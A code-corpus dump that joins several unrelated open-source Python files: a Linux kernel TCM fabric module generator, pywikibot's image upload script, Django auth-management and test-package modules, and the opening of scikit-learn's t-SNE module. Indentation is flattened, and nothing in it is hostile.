buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " u8 proto_id;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " proto_id = fc_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " proto_id = sas_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " proto_id = iscsi_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return proto_id;\n"
buf += "}\n\n"
bufi += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *);\n"
if re.search('get_wwn', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_name[0];\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *);\n"
if re.search('get_tag', fo):
buf += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " return tpg->" + fabric_mod_port + "_tpgt;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *);\n"
if re.search('get_default_depth', fo):
buf += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *);\n"
if re.search('get_pr_transport_id\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code,\n"
buf += " unsigned char *buf)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *, unsigned char *);\n"
if re.search('get_pr_transport_id_len\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *);\n"
if re.search('parse_pr_out_transport_id\)\(', fo):
buf += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " const char *buf,\n"
buf += " u32 *out_tid_len,\n"
buf += " char **port_nexus_ptr)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " char *tid = NULL;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " tid = fc_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " tid = sas_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " tid = iscsi_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
buf += " }\n\n"
buf += " return tid;\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(struct se_portal_group *,\n"
bufi += " const char *, u32 *, char **);\n"
if re.search('alloc_fabric_acl\)\(', fo):
buf += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n\n"
buf += " nacl = kzalloc(sizeof(struct " + fabric_mod_name + "_nacl), GFP_KERNEL);\n"
buf += " if (!nacl) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_nacl\\n\");\n"
buf += " return NULL;\n"
buf += " }\n\n"
buf += " return &nacl->se_node_acl;\n"
buf += "}\n\n"
bufi += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *);\n"
if re.search('release_fabric_acl\)\(', fo):
buf += "void " + fabric_mod_name + "_release_fabric_acl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_nacl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_fabric_acl(struct se_portal_group *,\n"
bufi += " struct se_node_acl *);\n"
if re.search('tpg_get_inst_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *);\n"
if re.search('\*release_cmd\)\(', fo):
buf += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *);\n"
if re.search('shutdown_session\)\(', fo):
buf += "int " + fabric_mod_name + "_shutdown_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_shutdown_session(struct se_session *);\n"
if re.search('close_session\)\(', fo):
buf += "void " + fabric_mod_name + "_close_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_close_session(struct se_session *);\n"
if re.search('stop_session\)\(', fo):
buf += "void " + fabric_mod_name + "_stop_session(struct se_session *se_sess, int sess_sleep , int conn_sleep)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_stop_session(struct se_session *, int, int);\n"
if re.search('fall_back_to_erl0\)\(', fo):
buf += "void " + fabric_mod_name + "_reset_nexus(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_reset_nexus(struct se_session *);\n"
if re.search('sess_logged_in\)\(', fo):
buf += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *);\n"
if re.search('sess_get_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *);\n"
if re.search('write_pending\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending(struct se_cmd *);\n"
if re.search('write_pending_status\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *);\n"
if re.search('set_default_node_attributes\)\(', fo):
buf += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *nacl)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *);\n"
if re.search('get_task_tag\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *);\n"
if re.search('get_cmd_state\)\(', fo):
buf += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *);\n"
if re.search('queue_data_in\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *);\n"
if re.search('queue_status\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_status(struct se_cmd *);\n"
if re.search('queue_tm_rsp\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *);\n"
if re.search('get_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void);\n"
if re.search('set_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *se_cmd, u32 sense_length)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *, u32);\n"
if re.search('is_state_remove\)\(', fo):
buf += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *);\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
ret = pi.write(bufi)
if ret:
tcm_mod_err("Unable to write fi: " + fi)
pi.close()
return
def tcm_mod_build_kbuild(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Makefile"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf += fabric_mod_name + "-objs := " + fabric_mod_name + "_fabric.o \\\n"
buf += " " + fabric_mod_name + "_configfs.o\n"
buf += "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name + ".o\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_build_kconfig(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Kconfig"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "config " + fabric_mod_name.upper() + "\n"
buf += " tristate \"" + fabric_mod_name.upper() + " fabric module\"\n"
buf += " depends on TARGET_CORE && CONFIGFS_FS\n"
buf += " default n\n"
buf += " ---help---\n"
buf += " Say Y here to enable the " + fabric_mod_name.upper() + " fabric module\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_add_kbuild(tcm_dir, fabric_mod_name):
buf = "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name.lower() + "/\n"
kbuild = tcm_dir + "/drivers/target/Makefile"
f = open(kbuild, 'a')
f.write(buf)
f.close()
return
def tcm_mod_add_kconfig(tcm_dir, fabric_mod_name):
buf = "source \"drivers/target/" + fabric_mod_name.lower() + "/Kconfig\"\n"
kconfig = tcm_dir + "/drivers/target/Kconfig"
f = open(kconfig, 'a')
f.write(buf)
f.close()
return
def main(modname, proto_ident):
# proto_ident = "FC"
# proto_ident = "SAS"
# proto_ident = "iSCSI"
    tcm_dir = os.getcwd()
tcm_dir += "/../../"
print "tcm_dir: " + tcm_dir
fabric_mod_name = modname
fabric_mod_dir = tcm_dir + "drivers/target/" + fabric_mod_name
print "Set fabric_mod_name: " + fabric_mod_name
print "Set fabric_mod_dir: " + fabric_mod_dir
print "Using proto_ident: " + proto_ident
if proto_ident != "FC" and proto_ident != "SAS" and proto_ident != "iSCSI":
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
ret = tcm_mod_create_module_subdir(fabric_mod_dir)
if ret:
print "tcm_mod_create_module_subdir() failed because module already exists!"
sys.exit(1)
tcm_mod_build_base_includes(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_scan_fabric_ops(tcm_dir)
tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_configfs(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kbuild(fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kconfig(fabric_mod_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Makefile..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kbuild(tcm_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Kconfig..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kconfig(tcm_dir, fabric_mod_name)
return
parser = optparse.OptionParser()
parser.add_option('-m', '--modulename', help='Module name', dest='modname',
action='store', nargs=1, type='string')
parser.add_option('-p', '--protoident', help='Protocol Ident', dest='protoident',
action='store', nargs=1, type='string')
(opts, args) = parser.parse_args()
mandatories = ['modname', 'protoident']
for m in mandatories:
if not opts.__dict__[m]:
print "mandatory option is missing\n"
parser.print_help()
exit(-1)
if __name__ == "__main__":
main(str(opts.modname), opts.protoident)
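# Example invocation (run from Documentation/target/ inside a kernel tree so
# the ../../ paths above resolve; see tcm_mod_builder.txt):
#   python tcm_mod_builder.py -m tcm_nab5000 -p iSCSI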
|
wikimedia/pywikibot-core
|
refs/heads/master
|
scripts/upload.py
|
1
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Script to upload images to Wikipedia.
The following parameters are supported:
-keep Keep the filename as is
-filename: Target filename without the namespace prefix
-prefix: Add specified prefix to every filename.
-noverify Do not ask for verification of the upload description if one
is given
-abortonwarn: Abort upload on the specified warning type. If no warning type
is specified, aborts on any warning.
-ignorewarn: Ignores specified upload warnings. If no warning type is
specified, ignores all warnings. Use with caution
-chunked: Upload the file in chunks (more overhead, but restartable). If
no value is specified the chunk size is 1 MiB. The value must
be a number which can be preceded by a suffix. The units are:
No suffix: Bytes
'k': Kilobytes (1000 B)
'M': Megabytes (1000000 B)
'Ki': Kibibytes (1024 B)
'Mi': Mebibytes (1024x1024 B)
The suffixes are case insensitive.
-always Don't ask the user anything. This will imply -keep and
-noverify and require that either -abortonwarn or -ignorewarn
is defined for all. It will also require a valid file name and
description. It'll only overwrite files if -ignorewarn includes
the 'exists' warning.
-recursive When the filename is a directory it also uploads the files from
the subdirectories.
-summary: Pick a custom edit summary for the bot.
-descfile: Specify a filename where the description is stored
It is possible to combine -abortonwarn and -ignorewarn so that when a specific
warning type is given, the more specific option takes precedence over the
general one. For example, to ignore specific warnings and abort on all others,
give -abortonwarn without a warning type and list the specific warnings under
-ignorewarn. The order does not matter. If both are given without a warning
type, or the same warning is specified by both, aborting takes precedence.
If any other arguments are given, the first is either URL, filename or
directory to upload, and the rest is a proposed description to go with the
upload. If none of these are given, the user is asked for the directory, file
or URL to upload. The bot will then upload the image to the wiki.
The script will ask for the location of the image(s), if not given as a
parameter, and for a description.
"""
#
# (C) Rob W.W. Hooft, Andre Engels 2003-2004
# (C) Pywikibot team, 2003-2019
#
# Distributed under the terms of the MIT license.
#
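# Example invocation (illustrative; assumes the usual pwb.py wrapper, a
# directory of images and a free-text description):
#
#     python pwb.py upload -keep -summary:"Batch upload" ./images "Old maps"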
from __future__ import absolute_import, division, unicode_literals
import codecs
import math
import os
import re
import pywikibot
from pywikibot.bot import suggest_help
from pywikibot.specialbots import UploadRobot
CHUNK_SIZE_REGEX = re.compile(
r'-chunked(?::(\d+(?:\.\d+)?)[ \t]*(k|ki|m|mi)?b?)?$', re.I)
def get_chunk_size(match):
"""Get chunk size."""
if not match:
pywikibot.error('Chunk size parameter is not valid.')
chunk_size = 0
elif match.group(1): # number was in there
base = float(match.group(1))
if match.group(2): # suffix too
suffix = match.group(2).lower()
if suffix == 'k':
suffix = 1000
elif suffix == 'm':
suffix = 1000000
elif suffix == 'ki':
suffix = 1 << 10
elif suffix == 'mi':
suffix = 1 << 20
else:
suffix = 1
chunk_size = math.trunc(base * suffix)
else:
chunk_size = 1 << 20 # default to 1 MiB
return chunk_size
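# Illustrative results of the parser above:
#     get_chunk_size(CHUNK_SIZE_REGEX.match('-chunked:5k'))   # -> 5000
#     get_chunk_size(CHUNK_SIZE_REGEX.match('-chunked:2Mi'))  # -> 2097152
#     get_chunk_size(CHUNK_SIZE_REGEX.match('-chunked'))      # -> 1048576 (1 MiB)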
def main(*args):
"""
Process command line arguments and invoke bot.
If args is an empty list, sys.argv is used.
@param args: command line arguments
@type args: str
"""
url = ''
description = []
summary = None
keep_filename = False
always = False
use_filename = None
filename_prefix = None
verify_description = True
aborts = set()
ignorewarn = set()
chunk_size = 0
recursive = False
description_file = None
# process all global bot args
# returns a list of non-global args, i.e. args for upload.py
local_args = pywikibot.handle_args(args)
for option in local_args:
arg, _, value = option.partition(':')
if arg == '-always':
keep_filename = True
always = True
verify_description = False
elif arg == '-recursive':
recursive = True
elif arg == '-keep':
keep_filename = True
elif arg == '-filename':
use_filename = value
elif arg == '-prefix':
filename_prefix = value
elif arg == '-summary':
summary = value
elif arg == '-noverify':
verify_description = False
elif arg == '-abortonwarn':
if value and aborts is not True:
aborts.add(value)
else:
aborts = True
elif arg == '-ignorewarn':
if value and ignorewarn is not True:
ignorewarn.add(value)
else:
ignorewarn = True
elif arg == '-chunked':
match = CHUNK_SIZE_REGEX.match(option)
chunk_size = get_chunk_size(match)
elif arg == '-descfile':
description_file = value
elif not url:
url = option
else:
description.append(option)
description = ' '.join(description)
if description_file:
if description:
pywikibot.error('Both a description and a -descfile were '
'provided. Please specify only one of those.')
return False
with codecs.open(description_file,
encoding=pywikibot.config.textfile_encoding) as f:
description = f.read().replace('\r\n', '\n')
while not ('://' in url or os.path.exists(url)):
if not url:
error = 'No input filename given.'
else:
error = 'Invalid input filename given.'
if not always:
error += ' Try again.'
if always:
url = None
break
else:
pywikibot.output(error)
url = pywikibot.input('URL, file or directory where files are now:')
if always and (aborts is not True and ignorewarn is not True
or not description or url is None):
additional = ''
missing = []
if url is None:
missing += ['filename']
additional = error + ' '
if description is None:
missing += ['description']
if aborts is not True and ignorewarn is not True:
additional += ('Either -ignorewarn or -abortonwarn must be '
'defined for all codes. ')
additional += 'Unable to run in -always mode'
suggest_help(missing_parameters=missing, additional_text=additional)
return False
if os.path.isdir(url):
file_list = []
for directory_info in os.walk(url):
if not recursive:
# Do not visit any subdirectories
directory_info[1][:] = []
for dir_file in directory_info[2]:
file_list.append(os.path.join(directory_info[0], dir_file))
url = file_list
else:
url = [url]
bot = UploadRobot(url, description=description, useFilename=use_filename,
keepFilename=keep_filename,
verifyDescription=verify_description, aborts=aborts,
ignoreWarning=ignorewarn, chunk_size=chunk_size,
always=always, summary=summary,
filename_prefix=filename_prefix)
bot.run()
if __name__ == '__main__':
main()
|
lz1988/django-web
|
refs/heads/master
|
build/lib/django/contrib/auth/management/__init__.py
|
70
|
"""
Creates permissions for all installed apps that need permissions.
"""
from __future__ import unicode_literals
import getpass
import locale
import unicodedata
from django.contrib.auth import models as auth_app, get_user_model
from django.core import exceptions
from django.core.management.base import CommandError
from django.db import DEFAULT_DB_ALIAS, router
from django.db.models import get_models, signals
from django.utils import six
from django.utils.six.moves import input
def _get_permission_codename(action, opts):
return '%s_%s' % (action, opts.object_name.lower())
def _get_all_permissions(opts, ctype):
"""
Returns (codename, name) for all permissions in the given opts.
"""
builtin = _get_builtin_permissions(opts)
custom = list(opts.permissions)
_check_permission_clashing(custom, builtin, ctype)
return builtin + custom
def _get_builtin_permissions(opts):
"""
Returns (codename, name) for all autogenerated permissions.
"""
perms = []
for action in ('add', 'change', 'delete'):
perms.append((_get_permission_codename(action, opts),
'Can %s %s' % (action, opts.verbose_name_raw)))
return perms
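# For a model whose object_name is "Article" this yields, illustratively:
#     [('add_article', 'Can add article'),
#      ('change_article', 'Can change article'),
#      ('delete_article', 'Can delete article')]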
def _check_permission_clashing(custom, builtin, ctype):
"""
Check that permissions for a model do not clash. Raises CommandError if
there are duplicate permissions.
"""
pool = set()
builtin_codenames = set(p[0] for p in builtin)
for codename, _name in custom:
if codename in pool:
raise CommandError(
"The permission codename '%s' is duplicated for model '%s.%s'." %
(codename, ctype.app_label, ctype.model_class().__name__))
elif codename in builtin_codenames:
raise CommandError(
"The permission codename '%s' clashes with a builtin permission "
"for model '%s.%s'." %
(codename, ctype.app_label, ctype.model_class().__name__))
pool.add(codename)
def create_permissions(app, created_models, verbosity, db=DEFAULT_DB_ALIAS, **kwargs):
if not router.allow_syncdb(db, auth_app.Permission):
return
from django.contrib.contenttypes.models import ContentType
app_models = get_models(app)
# This will hold the permissions we're looking for as
# (content_type, (codename, name))
searched_perms = list()
# The codenames and ctypes that should exist.
ctypes = set()
for klass in app_models:
# Force looking up the content types in the current database
# before creating foreign keys to them.
ctype = ContentType.objects.db_manager(db).get_for_model(klass)
ctypes.add(ctype)
for perm in _get_all_permissions(klass._meta, ctype):
searched_perms.append((ctype, perm))
# Find all the Permissions that have a content_type for a model we're
# looking for. We don't need to check for codenames since we already have
# a list of the ones we're going to create.
all_perms = set(auth_app.Permission.objects.using(db).filter(
content_type__in=ctypes,
).values_list(
"content_type", "codename"
))
perms = [
auth_app.Permission(codename=codename, name=name, content_type=ctype)
for ctype, (codename, name) in searched_perms
if (ctype.pk, codename) not in all_perms
]
auth_app.Permission.objects.using(db).bulk_create(perms)
if verbosity >= 2:
for perm in perms:
print("Adding permission '%s'" % perm)
def create_superuser(app, created_models, verbosity, db, **kwargs):
from django.core.management import call_command
UserModel = get_user_model()
if UserModel in created_models and kwargs.get('interactive', True):
msg = ("\nYou just installed Django's auth system, which means you "
"don't have any superusers defined.\nWould you like to create one "
"now? (yes/no): ")
confirm = input(msg)
while 1:
if confirm not in ('yes', 'no'):
confirm = input('Please enter either "yes" or "no": ')
continue
if confirm == 'yes':
call_command("createsuperuser", interactive=True, database=db)
break
def get_system_username():
"""
Try to determine the current system user's username.
:returns: The username as a unicode string, or an empty string if the
username could not be determined.
"""
try:
result = getpass.getuser()
except (ImportError, KeyError):
# KeyError will be raised by os.getpwuid() (called by getuser())
# if there is no corresponding entry in the /etc/passwd file
# (a very restricted chroot environment, for example).
return ''
if not six.PY3:
try:
default_locale = locale.getdefaultlocale()[1]
except ValueError:
return ''
if not default_locale:
return ''
try:
result = result.decode(default_locale)
except UnicodeDecodeError:
# UnicodeDecodeError - preventive treatment for non-latin Windows.
return ''
return result
def get_default_username(check_db=True):
"""
Try to determine the current system user's username to use as a default.
:param check_db: If ``True``, requires that the username does not match an
existing ``auth.User`` (otherwise returns an empty string).
:returns: The username, or an empty string if no username can be
determined.
"""
# If the User model has been swapped out, we can't make any assumptions
# about the default user name.
if auth_app.User._meta.swapped:
return ''
default_username = get_system_username()
try:
default_username = unicodedata.normalize('NFKD', default_username)\
.encode('ascii', 'ignore').decode('ascii').replace(' ', '').lower()
except UnicodeDecodeError:
return ''
# Run the username validator
try:
auth_app.User._meta.get_field('username').run_validators(default_username)
except exceptions.ValidationError:
return ''
# Don't return the default username if it is already taken.
if check_db and default_username:
try:
auth_app.User._default_manager.get(username=default_username)
except auth_app.User.DoesNotExist:
pass
else:
return ''
return default_username
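# Illustrative example of the normalization above: a system username such as
# 'José Pérez' becomes 'joseperez' (accents stripped via NFKD, spaces removed,
# lowercased) before being validated and checked against existing users.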
signals.post_syncdb.connect(create_permissions,
dispatch_uid="django.contrib.auth.management.create_permissions")
signals.post_syncdb.connect(create_superuser,
sender=auth_app, dispatch_uid="django.contrib.auth.management.create_superuser")
|
unaizalakain/django
|
refs/heads/master
|
django/test/__init__.py
|
341
|
"""
Django Unit Test and Doctest framework.
"""
from django.test.client import Client, RequestFactory
from django.test.testcases import (
LiveServerTestCase, SimpleTestCase, TestCase, TransactionTestCase,
skipIfDBFeature, skipUnlessAnyDBFeature, skipUnlessDBFeature,
)
from django.test.utils import (
ignore_warnings, modify_settings, override_settings,
override_system_checks,
)
__all__ = [
'Client', 'RequestFactory', 'TestCase', 'TransactionTestCase',
'SimpleTestCase', 'LiveServerTestCase', 'skipIfDBFeature',
'skipUnlessAnyDBFeature', 'skipUnlessDBFeature', 'ignore_warnings',
'modify_settings', 'override_settings', 'override_system_checks'
]
# To simplify Django's test suite; not meant as a public API
try:
from unittest import mock # NOQA
except ImportError:
try:
import mock # NOQA
except ImportError:
pass
|
466152112/scikit-learn
|
refs/heads/master
|
sklearn/manifold/t_sne.py
|
106
|
# Author: Alexander Fabisch -- <afabisch@informatik.uni-bremen.de>
# License: BSD 3 clause (C) 2014
# This is the standard t-SNE implementation. There are faster modifications of
# the algorithm:
# * Barnes-Hut-SNE: reduces the complexity of the gradient computation from
# N^2 to N log N (http://arxiv.org/abs/1301.3342)
# * Fast Optimization for t-SNE:
# http://cseweb.ucsd.edu/~lvdmaaten/workshops/nips2010/papers/vandermaaten.pdf
import numpy as np
from scipy import linalg
from scipy.spatial.distance import pdist
from scipy.spatial.distance import squareform
from ..base import BaseEstimator
from ..utils import check_array
from ..utils import check_random_state
from ..utils.extmath import _ravel
from ..decomposition import RandomizedPCA
from ..metrics.pairwise import pairwise_distances
from . import _utils
MACHINE_EPSILON = np.finfo(np.double).eps
def _joint_probabilities(distances, desired_perplexity, verbose):
"""Compute joint probabilities p_ij from distances.
Parameters
----------
distances : array, shape (n_samples * (n_samples-1) / 2,)
Distances of samples are stored as condensed matrices, i.e.
we omit the diagonal and duplicate entries and store everything
in a one-dimensional array.
